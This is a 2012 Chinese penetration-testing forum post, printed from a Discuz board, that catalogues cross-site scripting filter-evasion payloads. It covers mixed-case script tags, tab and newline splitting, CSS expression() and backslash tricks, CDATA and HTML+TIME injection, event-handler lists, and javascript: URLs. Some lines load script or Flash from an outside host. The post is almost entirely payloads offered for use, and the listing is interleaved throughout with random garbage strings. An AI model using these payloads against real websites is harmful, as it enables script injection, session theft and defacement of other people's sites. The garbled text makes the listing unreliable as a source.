中国网络渗透测试联盟

标题: Cross Site Scripting(XSS)攻击手法介绍 [打印本页]
作者: admin    时间: 2012-12-31 09:59
标题: Cross Site Scripting(XSS)攻击手法介绍
1. 改变字符大小写
. t) p9 k, [& o; i- @8 x4 U
3 B& }* Q# {# A2 C' g
: Y' Y. o8 r' I8 F# d
9 c( w) k6 O- a$ \+ D6 M3 h; C2 ~    <sCript>alert(‘d’)</scRipT>/ j$ j( \* L* R/ [# t

# y  e/ K  w1 i( U( }- q2. 利用多加一些其它字符来规避Regular Expression的检查
& O3 x4 d! u) @: ~  |
6 [0 Q+ v' d) R* T+ ^    <<script>alert(‘c’)//<</script>" `+ o: D! e# Q5 ]
) d3 H$ n' S1 r1 H  l0 R* q2 k
    <SCRIPT a=">" SRC="t.js"></SCRIPT>  O. Q/ m: N! q% C. Z) y4 h
9 F$ Q+ O/ w4 Q# S
    <SCRIPT =">" SRC="t.js"></SCRIPT>
" p5 t, w3 H! r4 `# p) s* B% N% ~  `* ^" ?, x; U
    <SCRIPT a=">" ” SRC="t.js"></SCRIPT>4 h& G% w% ~- E6 Z' r
. ~7 o/ R3 }' p, G
    <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>$ \7 m6 m; M) w) }7 d+ j

/ @! v" t7 b4 [9 D' T6 A7 O& ^    <SCRIPT a=`>` SRC="t.js"></SCRIPT>! t- t/ ~5 m, k5 _5 P

; \) [9 u- V( s9 l# F& a% S% m    <SCRIPT a=">’>" SRC="t.js"></SCRIPT>2 J: [; H3 O3 j5 Y
7 g6 p# b. p% s: n6 U2 o/ t/ e
3. 以其它扩展名取代.js
" b# J$ f4 L2 H( }
$ g7 P3 h) a# s8 G. I6 q    <script src="bad.jpg"></script>
; \" d4 |$ z5 U) \' n7 W
/ s7 T# h  \$ W6 A  t* W8 i4 L4. 将Javascript写在CSS档里( g" B. ]9 W# p9 r3 Z$ x9 K6 X

8 N. z; W7 n! t    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">+ i4 B  T+ E4 B5 c5 q
+ A/ \$ k9 M# Y7 g
       example:
' r# S+ R: p, i$ k! r; r
3 K& D6 F, e( I( n% _8 R( [          body {
) |  \: L( R4 \. g
7 {# l4 ~/ Y2 \) w               background-image: url(‘javascript:alert("XSS");’)" i* k' e' O) Y# v1 d
3 E' `+ R. ?9 _6 p" r* s$ `
          }
, X; K  O6 D" e( Z( \3 \" R  X  |4 _2 @( ]3 z8 w, d
5. 在script的tag里加入一些其它字符2 K) M3 p# Q: d* C. d; d7 D
* A/ H1 F( U, Q( l! F
    <SCRIPT/SRC="t.js"></SCRIPT>, O- v+ o7 G& A
0 }% h; ]  C1 j9 I  Q) L, @
    <SCRIPT/anyword SRC="t.js"></SCRIPT>
# k, T( J. q9 O8 `; `- a" {( [0 j5 s* P! \7 q  X
6. 使用tab或是new line来规避
/ H! G) M4 m1 r8 b# g$ K3 J$ \% C, a% z- E7 L" O+ x1 N6 h
    <img src="jav ascr ipt:alert(‘XSS3′)">) G$ p. |& Y% P* L! p' }: U2 K

! b" {! r- ^7 ~' V9 e/ P! v% i0 d    <img src="jav ascr ipt:alert(‘XSS3′)">
+ T: }$ U; h: k# Z8 k5 }9 w/ q) Q: A% c& W, }) I
    <IMG SRC="jav ascript:alert(‘XSS’);">) }+ w1 x! m3 l, |$ N8 e& @' f
1 E2 q# M/ h' e1 T1 W/ {. y( }; b
         -> tag
, o, `& H' ]3 @: a
4 e& H' S: x" i         -> new line' @) f' V  k+ Y  u5 x
9 V1 O, H# \! ^: y3 H
7. 使用"\"来规避
5 f; a" t8 q) Z. x3 _; b. l" e! k  w9 R2 B2 ?; _
    <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
. [5 _2 q1 ^) l1 l' m# A" b. h8 E$ i9 u  E6 [* |- d2 b. [
    <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
6 H" v3 ~7 F& F- Q  }' A( H* _8 ^' l: z
    <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
1 o. M2 S3 N8 \) N! g( t3 a* _( R6 ?% x5 Y. ]4 A1 j- f8 h1 t
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
$ Z) p2 T8 t- r4 j  g3 l9 p" M3 \' L5 X! i& t- @& F& s5 H
    <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>$ c5 ^: |( k6 S" C. J" Z9 j

- O' d- D% u  U) A  r$ T1 f8. 使用Hex encode来规避(也可能会把";"拿掉)
! ]. W- P+ f, C& h: ]! m
0 O" P1 _) I0 I& w    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">1 c. d% r& _, w4 y6 h- w' Q
* A1 S* Y; @& M# |
        原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">, i' G( F; {) }. g5 @" B7 O" S3 B
6 {3 a9 ^; a: O1 q) F9 S# i
    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);"># Y  C" y0 e) f

3 N- y8 P3 e1 R9 d' |0 K$ {4 v        原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
' o' w3 O9 z9 D' K+ {. }7 m, U1 R
9. script in HTML tag
7 i1 b+ V- J! c3 W) A# ?. B" @! z; m, f+ ~
    <body onload=」alert(‘onload’)」>+ B1 ^) [) N- y

0 [/ n& U. }* `        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload* W2 v7 {2 o. ]+ V3 z$ j; f$ C. D

8 @. @4 z" n3 r: y3 l10. 在swf里含有xss的code
# W3 D8 C! S. P# ]' }2 w1 @( w
    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>& F  a$ k- M9 M- l
9 i) [7 b' N5 a6 f: X$ [
11. 利用CDATA将xss的code拆开,再组合起来。% R& g4 Q9 r; @6 z
0 v6 Z1 L* @' C6 W0 K8 w4 }
    <XML ID=I><X><C>- n$ A* K& E: p9 [1 i. ?

6 x5 ^% D$ P8 r    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
; K7 q+ l& ?, ?/ ^- L
* F; Q5 G5 h* `9 s' D* O    </C></X>6 ], u, F2 m% N. {: Z- U& e

" p: t% O" l' k) H/ q+ D. z    </xml>! X! |3 w+ N& F3 l0 R$ X4 t7 @
* ~/ J; Y# ]0 l) J4 t; j
    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
& _- f3 Q, q& q- V0 z! {. `+ @
: H1 F1 [- e0 `9 W5 [6 \    <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
4 _* c* x# H/ Q8 l$ R- I/ {/ u
: b; ?- F: I2 E$ S' Y1 U, V    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
% b9 a% w: z* l5 }6 G* Z, g- y
* D8 t% Q1 w1 p- S12. 利用HTML+TIME。
5 v4 I& t! k; i; d
5 [/ Q# `+ [4 ~7 M    <HTML><BODY>- N5 U; f4 v& Q* v) N* r3 X* }3 M
( i- W8 y+ P  ~* `7 v  S" r
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
' O9 i1 M* ?  q) ~2 H& n) M! u# J- `2 P
    <?import namespace="t" implementation="#default#time2">- @) A; z& F  k9 y3 t4 Z  P& q

6 D6 s; A) I2 F* H7 T8 f- \    <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">2 G% p8 E, G6 N$ N0 T
7 _1 f. \8 E# @) h2 M) m  R
    </BODY></HTML>  |! n/ |5 y7 I( {/ k5 w6 G5 p

/ g  j: T2 K3 p. j1 e) h13. 透过META写入Cookie。
' T0 O7 R. W) Q& c' h) I9 W% q. ?+ W+ C8 X! O1 ?  d% \8 e
    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">) t4 o- l) m. y2 c* X7 K' U. b! z
1 ?) W9 ]" {) ]/ o2 _; W
14. javascript in src , href , url) Z4 {' V7 ?7 D9 L+ m
& j* j8 p. G4 _/ `8 S# q
    <IFRAME SRC=javascript:alert(’13′)></IFRAME>
- ?. ?% O6 k1 _+ q( l
  U. N2 o) R& ~0 v: o4 Y# }$ H0 Y    <img src="javascript:alert(‘XSS3′)">5 r! k: V% X, G' m8 |2 e: Y6 ?) w

5 E6 o5 V, z) Q% L7 h$ B<IMG DYNSRC="javascript:alert(‘XSS20′)">
- Z* Z% Z% x! Q! p$ l) O
0 y+ q9 {. q  a    <IMG LOWSRC="javascript:alert(‘XSS21′)">- S' }. s% [6 V# \& D

$ Z1 l' s: v* [+ F5 [; {    <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
. M$ r. Q7 D3 i4 k5 h4 P/ u2 W# E( J
    <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
! d: K' ^. |/ y6 L3 j2 I# T
& h1 l: L; ^; h# g0 s6 r    <TABLE BACKGROUND="javascript:alert(‘XSS29′)">
% [3 h" x8 ~) S7 T% }) g9 f* Z4 l" u+ q7 U% i) w6 @" s% C
    <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
! s2 z! v5 ?) j6 k. ?) B- H# `' [6 s4 _8 L8 m1 R. D
    <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}8 s; Q1 H! R* E( r. ~' V+ g
5 L" r1 B4 ]: ]+ _" s# |
    </STYLE><A CLASS=XSS></A>- N/ l# w* ^* j' i2 r$ F
$ |$ R. [4 Y# S7 O) C, ~( {; G
    <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>% |; s, D" Z* X/ a- R+ S! O0 E% m
1 U( S* W" E4 h2 Q3 ~  |




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2